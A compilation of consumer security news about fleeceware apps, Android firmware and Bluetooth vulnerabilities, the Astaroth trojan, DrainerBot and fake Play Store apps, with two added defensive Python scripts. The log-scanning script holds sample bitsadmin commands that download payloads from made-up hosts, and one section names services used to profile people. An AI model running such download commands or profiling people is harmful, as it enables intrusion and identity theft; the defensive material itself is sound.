Delete these 23 dangerous fleeceware apps from your smartphone now

They are back, and no one missed them. We are talking about fleeceware apps, a particular type of application capable of taking more than 200 euros from a user with a single click. Sophos researchers have discovered 23 apps that deceive users and activate very expensive monthly subscriptions without their knowledge.

Sophos researchers have unearthed 23 very dangerous apps that steal users' money. Here's what they are

This is certainly not new: we have covered the danger of these apps on other occasions, but it seemed that Google had managed to limit them by changing the terms of use of the Play Store. But as the saying goes: “made the law, found the deception”. According to Sophos researchers, the developers found a loophole in the rules of the new Google store policy and managed to publish 23 apparently free applications which, after a certain amount of time, activate subscriptions costing up to $249, charged directly to the user’s account. And everything is legitimate: it is the user himself who authorizes the payment when he installs the app, even if he is not aware of it.

What are “fleeceware” apps

They do not install any kind of virus, malware or spyware that can spy on the user: in the eyes of any antivirus, fleeceware apps are absolutely legitimate. But that does not make them harmless. The term fleeceware itself, coined by Sophos researchers to categorize this type of app, makes that clear.

In English the verb “to fleece” means “to undress”, “to shear” or even “to peel”. And that’s exactly what fleeceware apps do: they “skin” users, taking their money by activating monthly subscriptions at a very high cost. And they do it without the knowledge of the person, whose current account is charged directly.

How can such a thing happen? Because the developers are very good at hiding the fact that after a trial period the subscription starts automatically. The user installs the app and thinks it’s free forever, but it’s not. During the installation phase, the app warns the user of the automatic activation of the subscription once the trial period is over, but unfortunately very few people read the Terms of Use.

Fleeceware apps have evolved

To put an end to this scam, Google has changed the Terms of Use in recent months to make it clearer to the user when an app starts a subscription after the trial period. As often happens in these cases, however, developers have already found a way to revive fleeceware apps, using two new tactics called Blind Sub and Spam Sub.

In the first case, when a person opens one of these apps, he finds a button on the home screen that says “Try for free”. After pressing the button, the billing terms appear, but they do not make it clear that a paid subscription starts after the free trial period.

The second method, however, is even more subtle. It is enough to download an app and sign up for a service that seems to be free to find oneself enrolled in a mass subscription to a series of connected services that the user does not even know exist. This way the scammers are able to maximize their profit, even if only for a month.

What are the 23 apps to delete immediately from the Android smartphone

Sophos has also published a list of 23 fleeceware apps that are available on the Google Play store and have not been removed. In addition to the names of the applications, it has also published the price of the monthly or weekly subscription and the revenue made from the apps with this ploy. Here’s the full list:

com.photoconverter.fileconverter.jpegconverter – $ 249.99 / € 224.99 / year – $ 8k
com.recoverydeleted.recoveryphoto.photobackup – $ 249.99 / € 224.99 / year – $ 60k
com.screenrecorder.gamerecorder.screenrecording – $ 249.99 / € 224.99 / year – $ 10k
com.photogridmixer.instagrid – $ 229.99 / € 219.99 / year – $ 5k
com.compressvideo.videoextractor – $ 229.99 / € 219.99 / year – $ 10k
com.smartsearch.imagessearch – $ 229.99 / € 219.99 / year – $ 30k
com.emmcs.wallpapper – $ 89.99 / week – $ 20k
com.wallpaper.work.application – $ 89.99 / week – $ 30k
com.gametris.wallpaper.application – $ 89.99 / week – $ 30k
com.tell.shortvideo – $ 89.99 / week – $ 10k
com.csxykk.fontmoji – $ 89.99 / week – $ 40k
com.video.magician – $ 89.99 / week – $ 30k
com.el2020xstar.xstar – $ 89.99 / week – $ 10k
com.dev.palmistryastrology – $ 69.99 / week – $ 5k
com.dev.furturescope – $ 69.99 / week – $ 90k
com.fortunemirror – $ 69.99 / week – $ 20k
com.itools.prankcallfreelite – $ 44.99 / year – $ 5k
com.isocial.fakechat – $ 45.99 / year – $ 5k
com.old.me – $ 94.99 / year – $ 5k
com.myreplica.celebritylikeme.pr – $ 12.99 / € 10.99 / week – $ 5k
com.nineteen.pokeradar – Pay per install
com.pokemongo.ivgocalculator – Buggy app
com.hy.gscanner – $ 79.99 / year – $ 5k
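
One way to check a phone against the list above, added here as an example and not part of the Sophos report: the script parses the list as printed on this page and compares it with the output of adb shell pm list packages. The sample device output is constructed, and weekly prices are annualised on the assumption of 52 weeks per year.

```python
import re

# Entries as published in the list on this page: "package – price / period – revenue".
SOPHOS_LIST = """\
com.photoconverter.fileconverter.jpegconverter – $ 249.99 / € 224.99 / year – $ 8k
com.recoverydeleted.recoveryphoto.photobackup – $ 249.99 / € 224.99 / year – $ 60k
com.screenrecorder.gamerecorder.screenrecording – $ 249.99 / € 224.99 / year – $ 10k
com.photogridmixer.instagrid – $ 229.99 / € 219.99 / year – $ 5k
com.compressvideo.videoextractor – $ 229.99 / € 219.99 / year – $ 10k
com.smartsearch.imagessearch – $ 229.99 / € 219.99 / year – $ 30k
com.emmcs.wallpapper – $ 89.99 / week – $ 20k
com.wallpaper.work.application – $ 89.99 / week – $ 30k
com.gametris.wallpaper.application – $ 89.99 / week – $ 30k
com.tell.shortvideo – $ 89.99 / week – $ 10k
com.csxykk.fontmoji – $ 89.99 / week – $ 40k
com.video.magician – $ 89.99 / week – $ 30k
com.el2020xstar.xstar – $ 89.99 / week – $ 10k
com.dev.palmistryastrology – $ 69.99 / week – $ 5k
com.dev.furturescope – $ 69.99 / week – $ 90k
com.fortunemirror – $ 69.99 / week – $ 20k
com.itools.prankcallfreelite – $ 44.99 / year – $ 5k
com.isocial.fakechat – $ 45.99 / year – $ 5k
com.old.me – $ 94.99 / year – $ 5k
com.myreplica.celebritylikeme.pr – $ 12.99 / € 10.99 / week – $ 5k
com.nineteen.pokeradar – Pay per install
com.pokemongo.ivgocalculator – Buggy app
com.hy.gscanner – $ 79.99 / year – $ 5k
"""
WEEKS_PER_YEAR = 52  # assumption used to annualise weekly prices

def parse_list(text):
    """Map each package ID to its yearly cost in USD (None when no price is listed)."""
    costs = {}
    for line in text.splitlines():
        package, _, rest = line.strip().partition(" ")
        if not package:
            continue
        price = re.search(r"\$\s*(\d+(?:\.\d+)?)\s*/", rest)  # first "$ x /" is the price
        period = re.search(r"/\s*(year|week)\b", rest)
        if price and period:
            factor = WEEKS_PER_YEAR if period.group(1) == "week" else 1
            costs[package] = round(float(price.group(1)) * factor, 2)
        else:
            costs[package] = None  # "Pay per install" and "Buggy app" entries
    return costs

def installed_packages(pm_output):
    """Parse `pm list packages` output, which prints one `package:<id>` per line."""
    return {line.split(":", 1)[1].strip()
            for line in pm_output.splitlines() if line.startswith("package:")}

def audit(pm_output, costs=None):
    """Return [(package, yearly_usd)] for installed packages that appear on the list."""
    costs = parse_list(SOPHOS_LIST) if costs is None else costs
    return sorted((p, costs[p]) for p in installed_packages(pm_output) if p in costs)

# Constructed sample of `adb shell pm list packages` output (not from a real device).
SAMPLE_PM_OUTPUT = """\
package:com.android.chrome
package:com.tell.shortvideo
package:com.old.me
package:com.nineteen.pokeradar
"""

if __name__ == "__main__":
    for package, yearly in audit(SAMPLE_PM_OUTPUT):
        cost = f"${yearly:,.2f} per year" if yearly is not None else "no price listed"
        print(f"{package}: {cost}")
```

Uninstalling an app does not cancel a subscription that has already started, so any match should also be checked under Subscriptions in the Play Store account.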

How to protect yourself from fleeceware apps

There is no tool or application that can protect you from this type of scam. The only thing to do is to report this type of app to the Google Play Store and the App Store when you encounter one, so that it is immediately deleted.

Discovered 148 vulnerabilities affecting Android smartphones: the list

A report funded by the US Department of Security highlights Android security vulnerabilities on hundreds of millions of devices

When you buy an Android smartphone, it rarely comes with a pure version of the Google operating system installed. Unless you buy a Pixel or a device from the Android One program, you will have to deal with mobile phones full of software and apps made by third-party developers which, on more than a few occasions, can be full of vulnerabilities.

In cases like these, all the safety precautions you can take and all the tools present within the operating system have virtually no value. Hackers will have an easy time exploiting one of these vulnerabilities, which is there even before you purchase the smartphone. Thus, from the first power-on, an attacker could exploit these vulnerabilities and access information in the device’s memory.

This scenario is more frequent than you might imagine. Kryptowire, a company active in the field of information security, has just released a report on vulnerabilities in Android firmware, funded by the US National Security Department. According to this report, the devices of as many as 29 manufacturers (most of them Chinese, but there are also several big names) are affected by 150 vulnerabilities, some of which are quite dangerous.

Android vulnerabilities more dangerous than infected apps: what can happen?

As pointed out in the Kryptowire report, the vulnerabilities discovered in the apps pre-installed on smartphones are much more dangerous than the infected applications in the Play Store. The reason is simple: the latter, in the vast majority of cases, can be removed and, with them, the vulnerability or the malware they carry. The so-called bloatware, on the other hand, is installed at the operating system level and can hardly be deleted by the user. Even if the factory settings are reset, the vulnerable system app is still reinstalled on the device. In short, a problem apparently without a solution.

Which smartphones are in danger

According to the Kryptowire report, as many as 29 smartphone manufacturers are delivering devices with vulnerabilities of all kinds into their customers’ hands. Most of the devices made and sold by these producers contain these bugs and, as seen a little above, there is very little that users can do.

In the list we find little-known producers like Advan, Allview, Evercross, Tecno and Walton, but also brands of the level of Xiaomi, Asus, Samsung and Sony. The devices sold by these four producers alone easily exceed 130 million in 2019. Potentially, there are hundreds of millions, if not billions, of smartphones at risk. A danger far beyond what any infected app on the Play Store can potentially reach.

Bluetooth devices endanger smartphones: the list

US researchers have discovered a vulnerability of Android smartphones that can steal users' personal data

A new vulnerability affects Android smartphones and endangers hundreds of thousands of devices. The alarm was raised by researchers from Purdue University and Iowa University, who published a research paper showing that some Bluetooth devices or USB accessories are able to steal relevant smartphone information such as the IMEI number, the code used to identify a mobile phone.

The technique discovered by the researchers opens up an endless series of actions to a potential hacker, all of them very dangerous and a threat to users’ personal data. And that is not all: the devices can in turn be used to launch DDoS (Distributed Denial of Service) attacks capable of knocking out a website or a company network. The research was carried out on a dozen Android smartphones with different processors: Qualcomm, HiSilicon (Kirin) and Samsung (Exynos). All were vulnerable to the attack, albeit in different ways.

The researchers immediately alerted the producers and waited ninety days before publishing the report, to allow time to develop a patch. The only company that gave the researchers an answer was Samsung, which started developing a fix that will be published with the next updates.

How the vulnerability that affects Android smartphones works

Let’s start with the conclusion: the vulnerability discovered by the researchers is rather complicated to exploit and requires a big investment of time by the hackers. But some attackers could still exploit it to steal your personal information.

As explained in the research paper, the attack affects several Android smartphones and exploits an operating system flaw to “enter” the device. To do this it is necessary to use Bluetooth devices or USB accessories designed specifically for this type of operation. Researchers have shown that using these devices it is possible to execute AT commands. These are commands that set features such as connection type, waiting times, and busy signal detection. It is also possible to obtain the IMEI number of the smartphone, take control of the mobile phone to perform DDoS attacks or remotely cut off the smartphone’s connectivity. All of these are functions that matter in a person’s everyday life.

The list of Android smartphones affected by the vulnerability

The researchers tested ten devices from six different manufacturers. Here is the complete list:

Galaxy S8+
Google Pixel 2
Huawei Nexus 6P
Motorola Nexus 6
Galaxy Note 2
Galaxy S3
LG G3
LG Nexus 5
HTC Desire 10 Lifestyle
Huawei P8 Lite

These are fairly dated smartphones, but this does not mean that newer devices are not equally vulnerable to attack. As mentioned above, the researchers have warned the manufacturers, who are working to release a security patch as soon as possible. Samsung was the first to get to work on a solution to the problem.

How hackers spy on us: how to avoid the risk of hackers stealing data

The vast majority of targeted attacks start from a phishing mail
Just a photo or a phone number is enough to discover your identity on the Internet. Don’t believe it? Then you do not know about the experiments conducted by Kaspersky.

In recent years hacker attacks have increased exponentially. Some of these episodes have resulted in the theft of the personal data of millions of users of social networks and of other sites that require registration. In other cases, however, they were targeted attacks, meant to take possession of the personal data of specific people or to break into their computers and mobile devices.

According to the well-known computer security company Kaspersky, the vast majority of targeted attacks start from a phishing mail. This means that hackers have managed to get hold of some of the user’s data and have used it for a more complex and profitable attack on that user. But how do hackers steal the data? Kaspersky itself ran an experiment: it tried to replicate all the possible ways in which a hacker can obtain information about us starting from an anonymous photo, a name and surname or an email address and telephone number.

How to find out a person’s name from a photo

When a hacker has only one photo available, his search is uphill from the start. There are sites like FindFace that can recover a person’s social identity if they are given several shots to process. It was once a free tool open to the public; now the company prefers to sell its technology only to governments and large companies. A hacker could also use Google, but with very few results, because image search does not shine for accuracy and can only find photos posted on websites, not those posted on social networks.

How to find a person with name and surname

With the name and surname available, however, the hacker’s mission becomes simpler, unless the user has a very common name and surname, like Mario Rossi. With these two pieces of data it is often possible to find at least one more or less public social profile of the user, from which to extract other useful information to continue the attack.

How to find a person with email

With an email address and phone number an attacker can use services like Pipl, which collects information from different social networks and creates almost complete profiles with everything on the web about that person. If the username of the personal mailbox is the same as that of the company one, an attacker could use programs like Namechk or Knowem, which automatically track down accounts created with hundreds of different services, including Facebook, Blogger, eBay, WordPress, Pinterest and many others. Therefore, starting from a company email address, it is easy to reach a personal profile.

What to do to avoid identity theft

To avoid the risk of hackers stealing data, Kaspersky reiterates some basic advice:

Do not register on social networks with e-mail addresses or phone numbers that are then made public
Do not use the same photo on personal and work profiles
Use different names to prevent one profile from leading to another and so on
Do not make life easier for cybercriminals by posting unnecessary information about you on social networks

Astaroth: a trojan disguised as an image can infect PCs and steal your data

A trojan disguised as an image can infect PCs and avoid being recognized by antivirus. Here’s how Astaroth works

A new hacker campaign using the Astaroth trojan, already known to security experts because it infected thousands of computers around the world in the last three months of 2018, is currently underway in Brazil and Europe. The infection starts from a fake image, spread by email.

The new strain of the trojan was discovered by Cybereason researchers and also uses BITSAdmin, an official Microsoft Windows utility designed to facilitate download and upload operations, which the trojan uses to download malicious code. This variant of Astaroth is distributed through spam email campaigns, and the infection begins when the user opens an archive in .7zip format that is attached to the email, reached through a link or, indeed, placed in a Gif or Jpg image. The malicious archive contains a .lnk file that starts the actual infection. Subsequently, the malware connects to a server and begins to steal information from the infected computer. It then uses BITSAdmin to fetch other images and files from another server.
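
As an added illustration (not code from Cybereason or from the original article), the BITSAdmin download step described above can be looked for in process-creation logs. The record fields, host names, job names and URLs below are constructed, and the image-extension tag is a heuristic assumed from the article's description of payloads disguised as Gif or Jpg images.

```python
import ntpath
import shlex
from urllib.parse import urlparse

IMAGE_EXTS = {".jpg", ".jpeg", ".gif"}  # the disguises named in the article


def split_cmdline(cmdline):
    """Tokenise a Windows command line, keeping backslashes; fall back on bad quoting."""
    try:
        tokens = shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quote in the logged command line
        tokens = cmdline.split()
    return [t.strip('"') for t in tokens]


def inspect_event(event):
    """Return a finding for a bitsadmin download from a remote URL, else None."""
    if ntpath.basename(event["image"]).lower() != "bitsadmin.exe":
        return None
    tokens = split_cmdline(event["cmdline"])
    switches = {t.lower() for t in tokens if t.startswith("/")}
    if not switches & {"/transfer", "/addfile"} or "/upload" in switches:
        return None  # job listing, management commands and uploads are out of scope
    urls = [i for i, t in enumerate(tokens)
            if t.lower().startswith(("http://", "https://"))]
    if not urls:
        return None
    i = urls[0]
    remote = tokens[i]
    local = tokens[i + 1] if i + 1 < len(tokens) else None
    tags = ["remote-download"]
    if ntpath.splitext(urlparse(remote).path)[1].lower() in IMAGE_EXTS:
        tags.append("image-extension")  # heuristic: payload fetched under an image name
    return {"host": event["host"], "remote": remote, "local": local, "tags": tags}


def scan(events):
    """Run inspect_event over all records and keep the findings."""
    return [finding for finding in map(inspect_event, events) if finding]


# Constructed process-creation records (hosts, job names and URLs are made up).
EVENTS = [
    {"host": "WS-014", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r'bitsadmin /transfer job1 /download /priority foreground '
                r'http://files.example.invalid/holiday.jpg "C:\Users\Public\holiday.jpg"'},
    {"host": "WS-014", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /list /allusers"},
    {"host": "WS-020", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\Public\notes.txt"},
    {"host": "SRV-02", "image": r"C:\Windows\SysWOW64\BITSAdmin.exe",
     "cmdline": r"bitsadmin /transfer pkg https://updates.example.invalid/agent.cab "
                r"D:\stage\agent.cab"},
]

if __name__ == "__main__":
    for finding in scan(EVENTS):
        print(finding)
```

BITSAdmin is also used by legitimate software, so the remote-download tag alone is a lead to review, not a verdict.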

Immune to antiviruses

The very dangerous thing about Astaroth, and the novelty compared to previous infections based on this trojan, is its ability to inject malicious code into a .dll file used by the Avast antivirus. Through this file, once it has been infected, the trojan manages to steal other information about the machine it is running on and to download other code. Moreover, it also manages to hide itself during an antivirus scan carried out with Avast.

What Astaroth does

The Cybereason research team has discovered that once the trojan has successfully infiltrated, it records user keystrokes, intercepts their calls to the operating system and continually gathers all the information saved to the clipboard. With these methods, it collects significant amounts of personal information, including information on the user’s bank accounts. And if the infected PC is connected to a LAN, Astaroth can also collect the network access passwords of all the other computers connected to the same LAN, email account passwords, Messenger account data and Internet Explorer passwords.

Astaroth first appeared online in 2017, and then infected thousands of PCs, especially in South America. It went through several evolutions before arriving at the current one. An earlier version, for example, was hidden in fake Amazon emails containing confirmations of orders never made by the user. If the user clicked on the links contained in the email, the infection started.

DrainerBot, the malware that consumes phone data traffic

A group of computer security researchers has discovered several counterfeit apps on the Play Store that consume data traffic by reproducing advertisements.

DrainerBot spreads thanks to apparently legitimate Android apps and high-sounding names

The imagination of hackers has, by now, accustomed us to practically everything. Over time we have seen malware designed to steal data; malware that turns PCs and smartphones into “zombies” and controls them remotely; not to mention malware that exploits the resources of the infected device to create cryptocurrencies of all kinds, from Monero to Bitcoin.

Viruses created to consume the data traffic of the affected users’ phone plan, however, had not yet been heard of. And, most likely, nobody missed them. The fact is that Oracle’s security researchers have found malicious code hidden in Android apps whose main purpose seems to be exactly that: to consume the gigabytes of data traffic in our data plan by running videos in the background, without the user noticing. Behind this anomalous behavior, however, hides a scam perpetrated by a group of hackers against advertising networks.

How DrainerBot works

The malware, as mentioned, spreads thanks to apparently legitimate Android apps with high-sounding names. At the moment, DrainerBot has been identified in the apps “Perfect365”, “VertexClub”, “Draw Clash of Clans”, “Touch ‘n’ Beat – Cinema” and “Solitaire: 4 Seasons (Full)”. As soon as the infected applications were downloaded and installed, DrainerBot went into operation, starting to play videos in the background and thus quickly consuming all the data traffic in the data plan.

But what is the real purpose of DrainerBot? As mentioned at the start, data consumption is only the most “obvious” behavior of the malware. In reality, compromised apps play advertising videos, which allow hackers to profit by cheating advertising networks. The ads, in fact, were not really seen by users, but were played without anyone noticing. Not even the managers of the scammed advertising networks.

According to Oracle analysts, infected apps can consume up to 10 gigabytes of data every month and therefore represent a risk for the users affected. If your tariff plan has lower thresholds, in fact, you run the risk of seeing your residual credit fall rapidly or, even worse, of receiving particularly high bills.

Android Virus: Delete 9 fake Apps immediately from your Android Devices

Eset, a company specializing in cybersecurity, has discovered nine applications on the Play Store that showed deceptive ads on the smartphone

They looked like harmless apps to turn the smartphone into a remote control, but they were not so harmless and they were removed from the Play Store. There are nine fake applications reported in recent days to Google by ESET, the company that develops the well-known Nod32 antivirus, because once installed they filled the user’s cell phone with advertising so invasive that the device was almost unusable.

The applications are all “remote controller” apps, that is, apps that let the smartphone control the TV, the air conditioner or any other device that can be controlled with a wireless connection. Their names are: Remote control for TV and home electronics, Remote control, TV remote controller, Remote for Air conditioner, TV remote controlling, Remote for television for free, Air conditioner remote control, Universal TV remote controller, Remote control for the car. They are all from the Tols4TV developer and were downloaded by at least 8 million users before being removed from the official Google store.

Fake Android applications: what are the dangers for the smartphone

These are completely fake applications: none of them carried out the remote control functions promised before installation. Instead they did something else: some ran in the background, making it difficult for the user to deactivate them; others, while not loading in the background, were impossible to use once launched, because every user input was answered with a full-screen banner ad. Moreover, these 9 fake apps were not the only ones on the Play Store to behave this way: last week another antivirus company, Trend Micro, reported 85 that were completely similar. In this case the two developers of the apps were Alger Games and Kodev. Google responded to the reports by deleting all the apps from these developers from the Play Store.

Given the large number of fake apps on the official Google store, there was no lack of criticism of Big G over the lack of control over developers and individual apps. Both ESET and Trend Micro recommend that you pay close attention to the applications you download and install on your smartphone. The two computer security companies suggest reading the user reviews of an app carefully, checking the permissions required by the app before installing it, keeping the Android operating system updated and installing a good antivirus for mobile devices.